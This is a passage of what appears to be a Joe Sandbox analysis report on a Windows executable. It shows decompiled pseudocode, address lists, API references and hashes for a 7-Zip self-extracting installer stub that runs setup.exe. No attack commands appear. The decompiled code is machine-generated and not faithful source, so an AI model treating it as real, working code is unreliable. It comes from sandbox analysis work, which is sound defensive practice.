                              					E00403A9C(_v116);
                              					E00403A9C(_v80);
                              					E00403A9C(_v32);
                              					E00403A9C(_v156);
                              					L75:
                              					return 0;
                              				}
                              			}


































































                              0x00401934
                              0x00401891
                              0x00401739
                              0x0040174e
                              0x0040175b
                              0x0040175f
                              0x00401762
                              0x00401767
                              0x0040176b
                              0x00000000
                              0x00000000
                              0x0040176d
                              0x00401770
                              0x0040177d
                              0x0040177d
                              0x00000000
                              0x00401770
                              0x00401660
                              0x00401668
                              0x0040166b
                              0x00401675
                              0x0040167f
                              0x00401685
                              0x0040168b
                              0x00401691
                              0x0040169a
                              0x0040169a
                              0x004016a5
                              0x004016ad
                              0x004016b5
                              0x004016b7
                              0x004016c4
                              0x004016ca
                              0x004016d7
                              0x004016dd
                              0x004016e4
                              0x00401716
                              0x00401719
                              0x00401721
                              0x00000000
                              0x004016e6
                              0x004016e6
                              0x004016e9
                              0x004016f0
                              0x004016f2
                              0x004016f2
                              0x004016fa
                              0x00401702
                              0x00000000
                              0x00401707
                              0x004016e4
                              0x00401627
                              0x0040162c
                              0x00401637
                              0x00000000
                              0x0040163d
                              0x00401585
                              0x00401588
                              0x004015f1
                              0x004015f1
                              0x00000000
                              0x004015f1
                              0x0040158a
                              0x0040158d
                              0x00401594
                              0x0040159c
                              0x004015a6
                              0x004015b1
                              0x004015b7
                              0x004015bc
                              0x004015bc
                              0x004015c1
                              0x004015c3
                              0x004015c6
                              0x004015d0
                              0x004015df
                              0x004015eb
                              0x004015f0
                              0x004015c6
                              0x00000000
                              0x004015c1
                              0x0040158f
                              0x00401592
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040152a
                              0x00401531
                              0x0040163e
                              0x0040163e
                              0x00401640
                              0x00401649
                              0x00401649
                              0x004014e8
                              0x004014e8
                              0x004014ea
                              0x00401998
                              0x0040199e
                              0x004019a9
                              0x004019b1
                              0x004019bc
                              0x004019c1
                              0x00000000
                              0x004019c1
                              0x00401528
                              0x004014d7
                              0x004014da
                              0x004014e1
                              0x004014e3
                              0x004014e3
                              0x00000000
                              0x004014da
                              0x004011d7
                              0x004011ea
                              0x004011f0
                              0x004011f5
                              0x004011f7
                              0x0040121a
                              0x0040122c
                              0x00401234
                              0x0040123c
                              0x00401243
                              0x00401255
                              0x0040125d
                              0x00401265
                              0x0040126c
                              0x00401281
                              0x00401289
                              0x0040129a
                              0x0040129f
                              0x004012a1
                              0x004012a3
                              0x004012a3
                              0x004012b1
                              0x004012c7
                              0x004012c9
                              0x004012ce
                              0x004012d1
                              0x004012e2
                              0x004012e6
                              0x004012e6
                              0x004012eb
                              0x004012ee
                              0x0040139d
                              0x004013a5
                              0x004013c3
                              0x004013ce
                              0x004013d6
                              0x004013e5
                              0x00401403
                              0x0040140e
                              0x00401416
                              0x00401425
                              0x00401433
                              0x00401454
                              0x0040145f
                              0x0040146a
                              0x00401472
                              0x0040147d
                              0x00401485
                              0x0040148d
                              0x00401492
                              0x0040149b
                              0x004014a1
                              0x004014ac
                              0x00000000
                              0x004012f4
                              0x004012f4
                              0x004012f7
                              0x00000000
                              0x00000000
                              0x00401306
                              0x0040130c
                              0x0040130f
                              0x00000000
                              0x00000000
                              0x0040131b
                              0x00401323
                              0x0040132b
                              0x00401330
                              0x00401333
                              0x00401339
                              0x0040133f
                              0x0040134a
                              0x00401352
                              0x0040135d
                              0x00401365
                              0x0040136d
                              0x00401375
                              0x0040137d
                              0x00401385
                              0x00401390
                              0x00000000
                              0x00401395
                              0x004012ee
                              0x004011f9
                              0x004011fc
                              0x00401203
                              0x00401205
                              0x00401205
                              0x0040120a
                              0x0040120c
                              0x00000000
                              0x00401186
                              0x00401189
                              0x00401192
                              0x00401192
                              0x00401197
                              0x00401199
                              0x004019c4
                              0x004019c7
                              0x004019cf
                              0x004019d7
                              0x004019df
                              0x004019e7
                              0x004019f2
                              0x004019fa
                              0x00000000
                              0x004019fa

                              APIs
                                • Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B
                              • GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B
                                • Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3
                                • Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
                                • Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618
                                • Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363
                                • Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328
                                • Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F
                              • MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
                              • ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
                              • MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306
                                • Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C
                                • Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000000), ref: 00401977
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
                              • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
                              • API String ID: 2760820266-829806607
                              • Opcode ID: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
                              • Opcode Fuzzy Hash: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E0040AD19(char* __ecx, void* __eflags) {
                              				signed int _t373;
                              				signed int _t382;
                              				intOrPtr* _t417;
                              				signed int _t419;
                              				signed int _t423;
                              				signed int _t429;
                              				signed int _t430;
                              				intOrPtr* _t440;
                              				intOrPtr* _t441;
                              				signed int _t453;
                              				signed int _t462;
                              				signed int _t463;
                              				signed int _t464;
                              				signed int _t471;
                              				signed int _t482;
                              				signed int _t483;
                              				signed int _t484;
                              				signed int _t490;
                              				signed int _t504;
                              				signed int _t505;
                              				intOrPtr _t507;
                              				signed int _t508;
                              				signed char _t510;
                              				char _t512;
                              				intOrPtr* _t513;
                              				signed int _t518;
                              				signed int _t523;
                              				signed int _t535;
                              				signed int _t537;
                              				signed int _t538;
                              				signed int _t539;
                              				intOrPtr* _t540;
                              				signed int _t580;
                              				signed int _t581;
                              				intOrPtr _t589;
                              				signed int _t595;
                              				signed int _t626;
                              				signed int _t652;
                              				signed int _t653;
                              				char* _t658;
                              				signed int _t660;
                              				signed int _t661;
                              				intOrPtr* _t662;
                              				signed int _t664;
                              				signed int* _t667;
                              				signed int _t668;
                              				signed int _t669;
                              				signed int _t670;
                              				intOrPtr _t671;
                              				signed int _t672;
                              				signed int _t673;
                              				signed int _t674;
                              				intOrPtr _t675;
                              				intOrPtr* _t676;
                              				signed int _t677;
                              				void* _t678;
                              
                              				E00413954(E0041A132, _t678);
                              				_t664 =  *(_t678 + 0x18);
                              				_t658 = __ecx;
                              				 *((intOrPtr*)(_t678 - 0x30)) = __ecx;
                              				if(E0040D7CC(_t664) == 0) {
                              					L81:
                              					_t373 = 0x80004001;
                              					L114:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t678 - 0xc));
                              					return _t373;
                              				}
                              				E00402155(_t678 - 0x2c);
                              				 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              				 *(_t678 - 4) = 0;
                              				 *((intOrPtr*)(_t678 - 0x50)) = 0;
                              				E00413310(_t678 - 0x4c);
                              				 *(_t678 - 4) = 1;
                              				E0040640D(_t678 - 0x50,  *(_t678 + 8));
                              				 *(_t678 + 8) = 0;
                              				if( *((intOrPtr*)(_t664 + 0x30)) <= 0) {
                              					L19:
                              					_t535 =  *( *(_t678 + 0x18) + 8);
                              					 *(_t678 - 0x18) = _t535;
                              					E0040ACC4(_t678 - 0xf8);
                              					 *(_t678 - 4) = 4;
                              					E0040B99B(_t678 - 0xa8);
                              					 *(_t678 - 4) = 5;
                              					E0040B63C( *(_t678 + 0x18), _t678 - 0xf8);
                              					if( *_t658 == 0) {
                              						L21:
                              						E004042D6();
                              						_t382 =  *(_t658 + 0x74);
                              						_t667 = _t658 + 0x74;
                              						if(_t382 != 0) {
                              							 *((intOrPtr*)( *_t382 + 8))(_t382);
                              							 *_t667 =  *_t667 & 0x00000000;
                              						}
                              						if( *((char*)(_t658 + 0x68)) != 0) {
                              							_push(0x88);
                              							_t504 = E00403A76();
                              							 *(_t678 + 8) = _t504;
                              							 *(_t678 - 4) = 6;
                              							if(_t504 == 0) {
                              								_t505 = 0;
                              								__eflags = 0;
                              							} else {
                              								_t505 = E0040B860(_t504);
                              							}
                              							 *(_t678 - 4) = 5;
                              							 *((intOrPtr*)(_t658 + 0x6c)) = _t505;
                              							E0040640D(_t667, _t505);
                              							_t507 =  *((intOrPtr*)(_t658 + 0x6c));
                              							if(_t507 == 0) {
                              								_t508 = 0;
                              								__eflags = 0;
                              							} else {
                              								_t508 = _t507 + 4;
                              							}
                              							 *((intOrPtr*)(_t658 + 0x70)) = _t508;
                              						}
                              						_t668 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70))))))(_t678 - 0xf8);
                              						_t700 = _t668;
                              						if(_t668 == 0) {
                              							 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
                              							__eflags = _t535;
                              							if(__eflags <= 0) {
                              								L50:
                              								E0040B96F(_t658 + 4, __eflags, _t678 - 0xf8);
                              								 *_t658 = 1;
                              								L51:
                              								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70)))) + 4))();
                              								_t669 = 0;
                              								__eflags =  *(_t678 - 0x18);
                              								 *((intOrPtr*)(_t678 - 0x34)) = 0;
                              								 *(_t678 + 0x10) = 0;
                              								 *(_t678 - 0x14) = 0;
                              								if( *(_t678 - 0x18) <= 0) {
                              									L105:
                              									E0040A402(_t678 - 0xf8,  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0xb0)))), _t678 - 0x58, _t678 - 0xfc);
                              									__eflags =  *((char*)(_t658 + 0x68));
                              									if( *((char*)(_t658 + 0x68)) != 0) {
                              										 *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t678 - 0x58));
                              									}
                              									__eflags =  *(_t678 - 0x18) - _t669;
                              									if( *(_t678 - 0x18) != _t669) {
                              										E004032A8(_t678 - 0x94, 4);
                              										 *((intOrPtr*)(_t678 - 0x94)) = 0x41b6b8;
                              										 *(_t678 - 4) = 0x1d;
                              										E00404327(_t678 - 0x94,  *(_t678 - 0x24));
                              										_t670 = 0;
                              										__eflags =  *(_t678 - 0x24);
                              										if( *(_t678 - 0x24) <= 0) {
                              											L112:
                              											_t660 =  *(_t658 + 0x74);
                              											 *((intOrPtr*)(_t678 - 0x54)) =  *((intOrPtr*)(_t678 + 0x1c));
                              											_t668 =  *((intOrPtr*)( *_t660 + 0xc))(_t660,  *((intOrPtr*)(_t678 - 0x88)), 0,  *(_t678 - 0x24), _t678 - 0x54, 0, 1,  *((intOrPtr*)(_t678 + 0x20)));
                              											 *(_t678 - 4) = 5;
                              											E004042AD(_t678 - 0x94);
                              											 *(_t678 - 4) = 0x1e;
                              											E004042AD(_t678 - 0xa8);
                              											 *(_t678 - 4) = 1;
                              											E004099BC(_t678 - 0xf8, __eflags);
                              											 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              											E0040B845(_t678 - 0x50);
                              											_t366 = _t678 - 4;
                              											 *_t366 =  *(_t678 - 4) | 0xffffffff;
                              											__eflags =  *_t366;
                              											E0040A5AC(_t678 - 0x2c);
                              											goto L113;
                              										} else {
                              											goto L111;
                              										}
                              										do {
                              											L111:
                              											E004039DF(_t678 - 0x94,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x20)) + _t670 * 4)))));
                              											_t670 = _t670 + 1;
                              											__eflags = _t670 -  *(_t678 - 0x24);
                              										} while (_t670 <  *(_t678 - 0x24));
                              										goto L112;
                              									} else {
                              										 *(_t678 - 4) = 0x1b;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x1c;
                              										_t668 = 0;
                              										__eflags = 0;
                              										goto L109;
                              									}
                              								}
                              								_t661 =  *(_t678 + 0x18);
                              								 *(_t678 + 8) = 0;
                              								do {
                              									 *(_t678 + 0x18) =  *(_t678 + 0x18) & 0x00000000;
                              									_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0xc)) +  *(_t678 - 0x14) * 4));
                              									_t417 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 8) +  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x84))))));
                              									 *(_t678 - 4) = 0x12;
                              									 *((intOrPtr*)( *_t417))(_t417, 0x41b298, _t678 + 0x18);
                              									_t419 =  *(_t678 + 0x18);
                              									__eflags = _t419;
                              									if(_t419 == 0) {
                              										L57:
                              										__eflags = _t419;
                              										 *(_t678 - 4) = 5;
                              										if(_t419 != 0) {
                              											 *((intOrPtr*)( *_t419 + 8))(_t419);
                              										}
                              										_t537 =  *(_t671 + 0x14);
                              										 *(_t678 + 8) =  *(_t678 + 8) + 4;
                              										_t672 =  *(_t671 + 0x18);
                              										E004032A8(_t678 - 0x6c, 4);
                              										 *((intOrPtr*)(_t678 - 0x6c)) = 0x41b68c;
                              										 *(_t678 - 4) = 0x17;
                              										E004032A8(_t678 - 0x80, 4);
                              										 *((intOrPtr*)(_t678 - 0x80)) = 0x41b68c;
                              										 *(_t678 - 4) = 0x18;
                              										E00404327(_t678 - 0x6c, _t537);
                              										_t423 = E00404327(_t678 - 0x80, _t672);
                              										__eflags = _t672;
                              										if(_t672 <= 0) {
                              											L61:
                              											 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
                              											__eflags = _t537;
                              											if(_t537 <= 0) {
                              												goto L94;
                              											}
                              											_t675 =  *((intOrPtr*)(_t678 - 0x34));
                              											do {
                              												_t580 =  *(_t661 + 0x1c);
                              												_t652 = 0;
                              												__eflags = _t580;
                              												if(_t580 <= 0) {
                              													L83:
                              													_t429 = _t423 | 0xffffffff;
                              													__eflags = _t429;
                              													L84:
                              													__eflags = _t429;
                              													if(_t429 < 0) {
                              														_t581 =  *(_t661 + 0x30);
                              														_t653 = 0;
                              														__eflags = _t581;
                              														if(_t581 <= 0) {
                              															L90:
                              															_t430 = _t429 | 0xffffffff;
                              															__eflags = _t430;
                              															L91:
                              															__eflags = _t430;
                              															if(_t430 < 0) {
                              																 *(_t678 - 4) = 0x17;
                              																E004042AD(_t678 - 0x80);
                              																 *(_t678 - 4) = 5;
                              																E004042AD(_t678 - 0x6c);
                              																 *(_t678 - 4) = 0x19;
                              																E004042AD(_t678 - 0xa8);
                              																 *(_t678 - 4) = 1;
                              																E004099BC(_t678 - 0xf8, __eflags);
                              																 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              																DeleteCriticalSection(_t678 - 0x4c);
                              																E00403800(_t678 - 0x50);
                              																 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              																 *(_t678 - 4) = 0x1a;
                              																E004042D6();
                              																 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                              																E004042AD(_t678 - 0x2c);
                              																_t373 = 0x80004005;
                              																goto L114;
                              															}
                              															_t589 =  *((intOrPtr*)(_t678 + 0x14));
                              															goto L93;
                              														}
                              														_t441 =  *((intOrPtr*)(_t661 + 0x34));
                              														while(1) {
                              															__eflags =  *_t441 - _t675;
                              															if( *_t441 == _t675) {
                              																break;
                              															}
                              															_t653 = _t653 + 1;
                              															_t441 = _t441 + 4;
                              															__eflags = _t653 - _t581;
                              															if(_t653 < _t581) {
                              																continue;
                              															}
                              															goto L90;
                              														}
                              														_t430 = _t653;
                              														goto L91;
                              													}
                              													_t430 =  *( *((intOrPtr*)(_t661 + 0x20)) + 4 + _t429 * 8);
                              													_t589 =  *((intOrPtr*)(_t661 + 0x48));
                              													goto L93;
                              												}
                              												_t440 =  *((intOrPtr*)(_t661 + 0x20));
                              												while(1) {
                              													__eflags =  *_t440 - _t675;
                              													if( *_t440 == _t675) {
                              														break;
                              													}
                              													_t652 = _t652 + 1;
                              													_t440 = _t440 + 8;
                              													__eflags = _t652 - _t580;
                              													if(_t652 < _t580) {
                              														continue;
                              													}
                              													goto L83;
                              												}
                              												_t429 = _t652;
                              												goto L84;
                              												L93:
                              												_t423 = E004039DF(_t678 - 0x6c, _t589 + _t430 * 8);
                              												 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
                              												_t675 = _t675 + 1;
                              												__eflags =  *(_t678 - 0x10) - _t537;
                              												 *((intOrPtr*)(_t678 - 0x34)) = _t675;
                              											} while ( *(_t678 - 0x10) < _t537);
                              											goto L94;
                              										} else {
                              											do {
                              												_t423 = E004039DF(_t678 - 0x80,  *((intOrPtr*)(_t661 + 0x48)) +  *(_t678 + 0x10) * 8);
                              												 *(_t678 + 0x10) =  *(_t678 + 0x10) + 1;
                              												_t672 = _t672 - 1;
                              												__eflags = _t672;
                              											} while (_t672 != 0);
                              											goto L61;
                              										}
                              									}
                              									_t595 =  *(_t671 + 0xc);
                              									__eflags = _t595 - 0xffffffff;
                              									 *(_t678 - 0x10) = _t595;
                              									if(_t595 > 0xffffffff) {
                              										__eflags = _t419;
                              										 *(_t678 - 4) = 5;
                              										if(_t419 != 0) {
                              											 *((intOrPtr*)( *_t419 + 8))(_t419);
                              										}
                              										 *(_t678 - 4) = 0x13;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x14;
                              										_t538 = 0x80004001;
                              										L103:
                              										E004042D6();
                              										 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                              										E004042AD(_t678 - 0x2c);
                              										_t373 = _t538;
                              										goto L114;
                              									}
                              									_t538 =  *((intOrPtr*)( *_t419 + 0xc))(_t419,  *((intOrPtr*)(_t671 + 0x10)),  *(_t678 - 0x10));
                              									__eflags = _t538;
                              									if(_t538 != 0) {
                              										_t453 =  *(_t678 + 0x18);
                              										 *(_t678 - 4) = 5;
                              										__eflags = _t453;
                              										if(_t453 != 0) {
                              											 *((intOrPtr*)( *_t453 + 8))(_t453);
                              										}
                              										 *(_t678 - 4) = 0x15;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										_t287 = _t678 - 4;
                              										 *_t287 =  *(_t678 - 4) & 0x00000000;
                              										__eflags =  *_t287;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x16;
                              										goto L103;
                              									}
                              									_t419 =  *(_t678 + 0x18);
                              									goto L57;
                              									L94:
                              									_t673 =  *(_t678 - 0x14);
                              									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x70)))) + 8))(_t673,  *((intOrPtr*)(_t678 - 0x60)),  *((intOrPtr*)(_t678 - 0x74)));
                              									 *(_t678 - 4) = 0x17;
                              									E004042AD(_t678 - 0x80);
                              									 *(_t678 - 4) = 5;
                              									E004042AD(_t678 - 0x6c);
                              									_t674 = _t673 + 1;
                              									__eflags = _t674 -  *(_t678 - 0x18);
                              									 *(_t678 - 0x14) = _t674;
                              								} while (_t674 <  *(_t678 - 0x18));
                              								_t658 =  *((intOrPtr*)(_t678 - 0x30));
                              								_t669 = 0;
                              								goto L105;
                              							} else {
                              								goto L34;
                              							}
                              							while(1) {
                              								L34:
                              								_t676 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 0x18) + 0xc)) +  *(_t678 - 0x10) * 4));
                              								 *(_t678 + 0x10) = 0;
                              								 *(_t678 + 8) = 0;
                              								_push(0);
                              								_push( *((intOrPtr*)(_t676 + 4)));
                              								 *(_t678 - 4) = 0xa;
                              								_push( *_t676);
                              								_t462 = E004063BD(_t678 + 0x10, _t678 + 8, __eflags);
                              								_t539 = _t462;
                              								__eflags = _t539;
                              								if(_t539 != 0) {
                              									break;
                              								}
                              								 *(_t678 - 0x14) =  *(_t678 - 0x14) & _t462;
                              								__eflags =  *((intOrPtr*)(_t676 + 0x14)) - 1;
                              								 *(_t678 - 4) = 0xd;
                              								if( *((intOrPtr*)(_t676 + 0x14)) != 1) {
                              									L40:
                              									__eflags =  *(_t678 + 8);
                              									if( *(_t678 + 8) == 0) {
                              										_t471 =  *(_t678 + 0x10);
                              										 *(_t678 - 4) = 5;
                              										__eflags = _t471;
                              										if(_t471 != 0) {
                              											 *((intOrPtr*)( *_t471 + 8))(_t471);
                              										}
                              										 *(_t678 - 4) = 0x10;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x11;
                              										E004042D6();
                              										_t237 = _t678 - 4;
                              										 *_t237 =  *(_t678 - 4) | 0xffffffff;
                              										__eflags =  *_t237;
                              										E004042AD(_t678 - 0x2c);
                              										goto L81;
                              									}
                              									E0040640D(_t678 - 0x14,  *(_t678 + 8));
                              									__eflags =  *((char*)(_t658 + 0x68));
                              									if(__eflags != 0) {
                              										E0040A0DE( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 8));
                              									}
                              									L43:
                              									_push(_t678 - 0x14);
                              									E0040BAB0(_t658 + 0x78);
                              									_t482 =  *(_t678 - 0x14);
                              									 *(_t678 - 4) = 0xa;
                              									__eflags = _t482;
                              									if(_t482 != 0) {
                              										 *((intOrPtr*)( *_t482 + 8))(_t482);
                              									}
                              									_t483 =  *(_t678 + 8);
                              									 *(_t678 - 4) = 9;
                              									__eflags = _t483;
                              									if(_t483 != 0) {
                              										 *((intOrPtr*)( *_t483 + 8))(_t483);
                              									}
                              									_t484 =  *(_t678 + 0x10);
                              									 *(_t678 - 4) = 5;
                              									__eflags = _t484;
                              									if(_t484 != 0) {
                              										 *((intOrPtr*)( *_t484 + 8))(_t484);
                              									}
                              									 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
                              									__eflags =  *(_t678 - 0x10) -  *(_t678 - 0x18);
                              									if(__eflags < 0) {
                              										continue;
                              									} else {
                              										goto L50;
                              									}
                              								}
                              								__eflags =  *((intOrPtr*)(_t676 + 0x18)) - 1;
                              								if( *((intOrPtr*)(_t676 + 0x18)) != 1) {
                              									goto L40;
                              								}
                              								_t626 =  *(_t678 + 0x10);
                              								__eflags = _t626;
                              								if(_t626 == 0) {
                              									_t490 =  *(_t678 + 8);
                              									 *(_t678 - 4) = 9;
                              									__eflags = _t490;
                              									if(_t490 != 0) {
                              										 *((intOrPtr*)( *_t490 + 8))(_t490);
                              										_t626 =  *(_t678 + 0x10);
                              									}
                              									__eflags = _t626;
                              									 *(_t678 - 4) = 5;
                              									if(_t626 != 0) {
                              										 *((intOrPtr*)( *_t626 + 8))(_t626);
                              									}
                              									 *(_t678 - 4) = 0xe;
                              									E004042AD(_t678 - 0xa8);
                              									 *(_t678 - 4) = 1;
                              									E004099BC(_t678 - 0xf8, __eflags);
                              									 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              									DeleteCriticalSection(_t678 - 0x4c);
                              									E00403800(_t678 - 0x50);
                              									 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              									 *(_t678 - 4) = 0xf;
                              									_t668 = 0x80004001;
                              									goto L109;
                              								}
                              								E0040640D(_t678 - 0x14, _t626);
                              								__eflags =  *((intOrPtr*)(_t658 + 0x68)) - _t539;
                              								if(__eflags != 0) {
                              									E0040A0B9( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 0x10));
                              								}
                              								goto L43;
                              							}
                              							_t463 =  *(_t678 + 8);
                              							 *(_t678 - 4) = 9;
                              							__eflags = _t463;
                              							if(_t463 != 0) {
                              								 *((intOrPtr*)( *_t463 + 8))(_t463);
                              							}
                              							_t464 =  *(_t678 + 0x10);
                              							 *(_t678 - 4) = 5;
                              							__eflags = _t464;
                              							if(_t464 != 0) {
                              								 *((intOrPtr*)( *_t464 + 8))(_t464);
                              							}
                              							 *(_t678 - 4) = 0xb;
                              							E004042AD(_t678 - 0xa8);
                              							 *(_t678 - 4) = 1;
                              							E004099BC(_t678 - 0xf8, __eflags);
                              							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              							DeleteCriticalSection(_t678 - 0x4c);
                              							E00403800(_t678 - 0x50);
                              							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              							 *(_t678 - 4) = 0xc;
                              							_t668 = _t539;
                              							goto L109;
                              						} else {
                              							 *(_t678 - 4) = 7;
                              							E004042AD(_t678 - 0xa8);
                              							 *(_t678 - 4) = 1;
                              							E004099BC(_t678 - 0xf8, _t700);
                              							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              							DeleteCriticalSection(_t678 - 0x4c);
                              							E00403800(_t678 - 0x50);
                              							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              							 *(_t678 - 4) = 8;
                              							L109:
                              							E004042D6();
                              							 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                              							E004042AD(_t678 - 0x2c);
                              							L113:
                              							_t373 = _t668;
                              							goto L114;
                              						}
                              					}
                              					_t510 = E0040B753(_t678 - 0xf8, _t658 + 4);
                              					asm("sbb al, al");
                              					_t512 =  ~_t510 + 1;
                              					 *((char*)(_t678 + 0xb)) = _t512;
                              					if(_t512 == 0) {
                              						goto L51;
                              					}
                              					goto L21;
                              				} else {
                              					_t540 =  *((intOrPtr*)(_t678 + 0x14));
                              					do {
                              						_push(0x18);
                              						_t513 = E00403A76();
                              						if(_t513 == 0) {
                              							_t662 = 0;
                              							__eflags = 0;
                              						} else {
                              							 *(_t513 + 4) =  *(_t513 + 4) & 0x00000000;
                              							 *_t513 = 0x41b6e8;
                              							_t662 = _t513;
                              						}
                              						 *((intOrPtr*)(_t678 - 0x34)) = _t662;
                              						if(_t662 != 0) {
                              							 *((intOrPtr*)( *_t662 + 4))(_t662);
                              						}
                              						_push(0x28);
                              						 *((intOrPtr*)(_t662 + 8)) = _t678 - 0x50;
                              						 *((intOrPtr*)(_t662 + 0x10)) =  *((intOrPtr*)(_t678 + 0xc));
                              						 *(_t662 + 0x14) =  *(_t678 + 0x10);
                              						 *((intOrPtr*)(_t678 + 0xc)) =  *((intOrPtr*)(_t678 + 0xc)) +  *_t540;
                              						 *(_t678 - 4) = 2;
                              						asm("adc [ebp+0x10], ecx");
                              						_t518 = E00403A76();
                              						if(_t518 == 0) {
                              							_t677 = 0;
                              							__eflags = 0;
                              						} else {
